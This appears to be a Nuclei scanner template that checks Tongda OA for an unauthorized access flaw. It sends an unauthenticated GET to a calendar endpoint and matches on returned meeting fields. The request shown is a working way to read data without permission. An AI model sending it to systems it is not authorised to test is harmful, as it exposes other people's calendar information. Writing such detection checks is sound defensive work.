id: tongda-meeting-unauthorizedAccess
info:
  name: tongda-meeting-unauthorized-access
  author:
  - l0ne1y
  description: |-
    Tongda OA Unauthorized Access Leading to Sensitive Information Disclosure
    An attacker can exploit this vulnerability to obtain sensitive website information. Due to improper permission controls in the web program, users can access or operate on data they are not authorized to access, i.e., unauthorized access.
  severity: medium
  remediation: |-
    #### Official remediation:
    Upgrade the system to a version without the vulnerability, or download the security patch from the official website.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - creator
    - originalTitle
  - type: word
    condition: and
    part: header
    words:
    - application/json
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay'
  method: GET
  headers:
    Accept-Encoding: deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
      Gecko) Chrome/62.0.3202.9 Safari/537.36
